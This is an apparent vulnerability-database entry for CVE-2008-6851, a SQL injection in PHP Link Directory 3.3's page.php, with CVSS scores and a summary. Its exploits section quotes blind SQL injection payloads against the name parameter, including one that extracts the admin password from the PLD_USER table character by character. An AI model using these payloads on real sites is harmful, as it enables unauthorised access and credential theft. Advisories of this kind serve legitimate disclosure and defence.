5.1
CVSSv2

CVE-2008-6851

Published: 07/07/2009 Updated: 29/09/2017
CVSS v2 Base Score: 5.1 | Impact Score: 6.4 | Exploitability Score: 4.9
VMScore: 515
Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in page.php in PHP Link Directory (phpLD) 3.3, when register_globals is enabled and magic_quotes_gpc is disabled, allows remote malicious users to execute arbitrary SQL commands via the name parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

php link directory php link directory 3.3

Exploits

phpLD 33 Blind SQL Injection wwwphplinkdirectorycom/ magic_quotes_gpc = Off register_globals = On Vulnerable: GET site/phpld/pagephp?name= True Request: (validpagename)' or 1=1# False Request: (validpagename)' or 1=0# Try this (urlencode): (validpagename)' or ORD(MID((SELECT PASSWORD FROM PLD_USER WHERE ID = 1),1,1))>1# et ...